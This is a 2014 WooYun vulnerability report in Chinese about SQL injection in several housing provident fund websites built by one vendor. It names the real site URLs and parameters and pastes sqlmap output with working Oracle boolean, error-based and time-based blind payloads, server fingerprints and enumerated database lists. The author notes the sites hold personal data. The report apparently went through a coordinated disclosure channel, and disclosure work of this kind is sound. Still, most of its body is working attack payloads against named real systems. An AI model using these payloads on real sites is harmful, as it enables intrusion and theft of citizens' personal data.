当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-070942

漏洞标题:某住房公积金系统存在多处SQL注入漏洞

相关厂商:长达科技

漏洞作者: 浮萍

提交时间:2014-08-04 12:02

修复时间:2014-11-02 12:04

公开时间:2014-11-02 12:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-04: 细节已通知厂商并且等待厂商处理中
2014-08-08: 厂商已经确认,细节仅向厂商公开
2014-08-11: 细节向第三方安全合作伙伴开放
2014-10-02: 细节向核心白帽子及相关领域专家公开
2014-10-12: 细节向普通白帽子公开
2014-10-22: 细节向实习白帽子公开
2014-11-02: 细节向公众公开

简要描述:

住房公积金貌似有很多个人信息吧

详细说明:

今天提交了一个SQL注入的漏洞
发现了这个“技术支持:长达科技”
就百度了一下

Snap79.jpg


3个 还都是公积金网站
先去看看

Snap80.jpg


Snap81.jpg


可是别的两个网站没有search.aspx
又发现一个地方

Snap82.jpg


Snap83.jpg


Snap84.jpg


Snap85.jpg


Snap86.jpg


这么少肯定不够呀
然后看友情链接这里

Snap87.jpg


一个一个点进去看看

Snap88.jpg


果然还是长达科技

Snap89.jpg


Snap92.jpg


暂时就这几处吧

漏洞证明:

http://www.esgjj.cn/Search.aspx?ArticleTitle=0
http://www.ysgjj.com/User/Search.aspx?key=a
http://www.hggjj.cn/User/Search.aspx?key=a
http://www.esgjj.cn/Messages.aspx
http://www.syjyzfgjj.com/Messages.aspx
http://www.ymgjj.com/Messages.aspx
http://www.esgjj.cn/Search.aspx?ArticleTitle=0

---
Place: GET
Parameter: ArticleTitle
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ArticleTitle=0%' AND 3476=3476 AND '%'='
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: ArticleTitle=0%' AND 4608=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||C
HR(113)||CHR(102)||CHR(98)||CHR(102)||CHR(113)||(SELECT (CASE WHEN (4608=4608) T
HEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(116)||CHR(116)||CHR(113)||CHR(113)||
CHR(62))) FROM DUAL) AND '%'='
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: ArticleTitle=0%' AND 2452=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(86
)||CHR(115)||CHR(120),5) AND '%'='
---


web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle


available databases [25]:
[*] AAA
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] ES20140417
[*] ESGJJ20130108
[*] ESGJJWZ
[*] ESWZ
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] QTZFZJ
[*] SCOTT
[*] SJ
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TEST
[*] TSMSYS
[*] WJXX
[*] WMSYS
[*] XDB
[*] ZFGJJ


http://www.ysgjj.com/User/Search.aspx?key=a

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: key
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: key=a%' AND 1219=1219 AND '%'='
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: key=a%' AND 5934=DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(88)||CHR(85
)||CHR(89),5) AND '%'='
---


web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Oracle


Snap91.jpg


http://www.hggjj.cn/User/Search.aspx?key=a

GET parameter 'key' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] n
sqlmap identified the following injection points with a total of 64 HTTP(s) requ
ests:
---
Place: GET
Parameter: key
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: key=a%' AND 1201=1201 AND '%'='
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: key=a%' AND 8613=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(101)||CHR(1
06)||CHR(70),5) AND '%'='
---


web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle


Snap90.jpg


http://www.syjyzfgjj.com/Messages.aspx
post注入
我一般喜欢get
通过抓包
返回拼写url地址

http://www.syjyzfgjj.com/Messages.aspx?__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUJNDM3ODUwNjUzDxYCHgRwYWdlAgEWAmYPZBYCAgEPZBYCAgEPZBYSAgMPEA8WBh4ORGF0YVZhbHVlRmllbGQFAmlkHg1EYXRhVGV4dEZpZWxkBQV0aXRsZR4LXyFEYXRhQm91bmRnZBAVBAblhajpg6gG5oqV6K%2BJBuW7uuiurgblkqjor6IVBAEwIDkxNUM4QjQ4NkU2OTRDREZBRUNFQkRGQkQwNDBBMUYzIDkyMUUzQkQ2QTUxNDRFQTc4NkQyOUQ0NkJCRDg3QUVCIDREQTc3QkM2NDVEMDQyMkFCNUY3RUY0MjI1RkFGRjM0FCsDBGdnZ2dkZAIRDxYCHgtfIUl0ZW1Db3VudGZkAhMPDxYCHgRUZXh0BQExZGQCFQ8PFgIfBQUBMGRkAhcPDxYCHwUFATBkZAIbDw8WBB8FBQnkuIrkuIDpobUeB0VuYWJsZWRoZGQCHQ8PFgIfBmhkZAIhDxBkZBYBAgJkAiMPDxYCHwVlZGRkUyF8vektP%2FuAx69UCrjVkzDVCxk%3D&__EVENTVALIDATION=%2FwEWFwLynYiqBALPlaOYDgL0waHFBgL0%2BY6SCQKPo4%2FEBwL%2Fi9q%2BAgKZ%2FYHoBALgvuebBgLdrs75DQKskoPMCwKhlcGtBAKGubqKAQLbo5uXCwLl%2BYmoCgLQqZ3FDQKa9f%2FvDAKZkYKpDwKUwrz2BQKfrZaYCQKMrZaYCQKbrd6bCQKbre6bCQKardabCeR%2BMaa%2BSB3kMxDFC38h2e3JXZyX&ctl00%24ContentPlaceHolder1%24ddlType=4DA77BC645D0422AB5F7EF4225FAFF34&ctl00%24ContentPlaceHolder1%24ddlReply=%E5%85%A8%E9%83%A8&ctl00%24ContentPlaceHolder1%24txtStart=&ctl00%24ContentPlaceHolder1%24txtEnd=&ctl00%24ContentPlaceHolder1%24ddlTitle=title&ctl00%24ContentPlaceHolder1%24txtTitle=a*&ctl00%24ContentPlaceHolder1%24btnSelect=%E6%9F%A5%E8%AF%A2&ctl00%24ContentPlaceHolder1%24ddlSize=12


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: URI
Parameter: #1*
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: http://www.syjyzfgjj.com:80/Messages.aspx?__EVENTTARGET=&__EVENTARG
UMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUJNDM3ODUwNjUzDxYCHgRwYWdlAgEWAmYPZBYCAgEP
ZBYCAgEPZBYSAgMPEA8WBh4ORGF0YVZhbHVlRmllbGQFAmlkHg1EYXRhVGV4dEZpZWxkBQV0aXRsZR4L
XyFEYXRhQm91bmRnZBAVBAblhajpg6gG5oqV6K+JBuW7uuiurgblkqjor6IVBAEwIDkxNUM4QjQ4NkU2
OTRDREZBRUNFQkRGQkQwNDBBMUYzIDkyMUUzQkQ2QTUxNDRFQTc4NkQyOUQ0NkJCRDg3QUVCIDREQTc3
QkM2NDVEMDQyMkFCNUY3RUY0MjI1RkFGRjM0FCsDBGdnZ2dkZAIRDxYCHgtfIUl0ZW1Db3VudGZkAhMP
DxYCHgRUZXh0BQExZGQCFQ8PFgIfBQUBMGRkAhcPDxYCHwUFATBkZAIbDw8WBB8FBQnkuIrkuIDpobUe
B0VuYWJsZWRoZGQCHQ8PFgIfBmhkZAIhDxBkZBYBAgJkAiMPDxYCHwVlZGRkUyF8vektP/uAx69UCrjV
kzDVCxk=&__EVENTVALIDATION=/wEWFwLynYiqBALPlaOYDgL0waHFBgL0+Y6SCQKPo4/EBwL/i9q+A
gKZ/YHoBALgvuebBgLdrs75DQKskoPMCwKhlcGtBAKGubqKAQLbo5uXCwLl+YmoCgLQqZ3FDQKa9f/vD
AKZkYKpDwKUwrz2BQKfrZaYCQKMrZaYCQKbrd6bCQKbre6bCQKardabCeR+Maa+SB3kMxDFC38h2e3JX
ZyX&ctl00$ContentPlaceHolder1$ddlType=4DA77BC645D0422AB5F7EF4225FAFF34&ctl00$Con
tentPlaceHolder1$ddlReply=%E5%85%A8%E9%83%A8&ctl00$ContentPlaceHolder1$txtStart=
&ctl00$ContentPlaceHolder1$txtEnd=&ctl00$ContentPlaceHolder1$ddlTitle=title&ctl0
0$ContentPlaceHolder1$txtTitle=a' AND 6479=(SELECT UPPER(XMLType(CHR(60)||CHR(58
)||CHR(113)||CHR(106)||CHR(113)||CHR(104)||CHR(113)||(SELECT (CASE WHEN (6479=64
79) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(111)||CHR(107)||CHR(105)||CHR(1
13)||CHR(62))) FROM DUAL) AND 'HWcQ'='HWcQ&ctl00$ContentPlaceHolder1$btnSelect=%
E6%9F%A5%E8%AF%A2&ctl00$ContentPlaceHolder1$ddlSize=12
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (comment)
Payload: http://www.syjyzfgjj.com:80/Messages.aspx?__EVENTTARGET=&__EVENTARG
UMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwUJNDM3ODUwNjUzDxYCHgRwYWdlAgEWAmYPZBYCAgEP
ZBYCAgEPZBYSAgMPEA8WBh4ORGF0YVZhbHVlRmllbGQFAmlkHg1EYXRhVGV4dEZpZWxkBQV0aXRsZR4L
XyFEYXRhQm91bmRnZBAVBAblhajpg6gG5oqV6K+JBuW7uuiurgblkqjor6IVBAEwIDkxNUM4QjQ4NkU2
OTRDREZBRUNFQkRGQkQwNDBBMUYzIDkyMUUzQkQ2QTUxNDRFQTc4NkQyOUQ0NkJCRDg3QUVCIDREQTc3
QkM2NDVEMDQyMkFCNUY3RUY0MjI1RkFGRjM0FCsDBGdnZ2dkZAIRDxYCHgtfIUl0ZW1Db3VudGZkAhMP
DxYCHgRUZXh0BQExZGQCFQ8PFgIfBQUBMGRkAhcPDxYCHwUFATBkZAIbDw8WBB8FBQnkuIrkuIDpobUe
B0VuYWJsZWRoZGQCHQ8PFgIfBmhkZAIhDxBkZBYBAgJkAiMPDxYCHwVlZGRkUyF8vektP/uAx69UCrjV
kzDVCxk=&__EVENTVALIDATION=/wEWFwLynYiqBALPlaOYDgL0waHFBgL0+Y6SCQKPo4/EBwL/i9q+A
gKZ/YHoBALgvuebBgLdrs75DQKskoPMCwKhlcGtBAKGubqKAQLbo5uXCwLl+YmoCgLQqZ3FDQKa9f/vD
AKZkYKpDwKUwrz2BQKfrZaYCQKMrZaYCQKbrd6bCQKbre6bCQKardabCeR+Maa+SB3kMxDFC38h2e3JX
ZyX&ctl00$ContentPlaceHolder1$ddlType=4DA77BC645D0422AB5F7EF4225FAFF34&ctl00$Con
tentPlaceHolder1$ddlReply=%E5%85%A8%E9%83%A8&ctl00$ContentPlaceHolder1$txtStart=
&ctl00$ContentPlaceHolder1$txtEnd=&ctl00$ContentPlaceHolder1$ddlTitle=title&ctl0
0$ContentPlaceHolder1$txtTitle=a' AND 6310=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CH
R(115)||CHR(83)||CHR(87),5)--&ctl00$ContentPlaceHolder1$btnSelect=%E6%9F%A5%E8%A
F%A2&ctl00$ContentPlaceHolder1$ddlSize=12
---


web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle


available databases [20]:
[*] CTXSYS
[*] CW
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SMS
[*] SYGJJWZ
[*] SYS
[*] SYSJ
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] ZFGJJ


最后一个数据库ZFGJJ=住房公积金
然后看看表有359个
还有一个就不贴了
住房公积金貌似有很多个人信息吧

修复方案:

版权声明:转载请注明来源 浮萍@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2014-08-08 16:21

厂商回复:

CNVD确认并复现所述漏洞情况,根据测试用例,已经转由CNCERT下发给湖北分中心,由湖北分中心后续协调网站管理单位处置。

最新状态:

暂无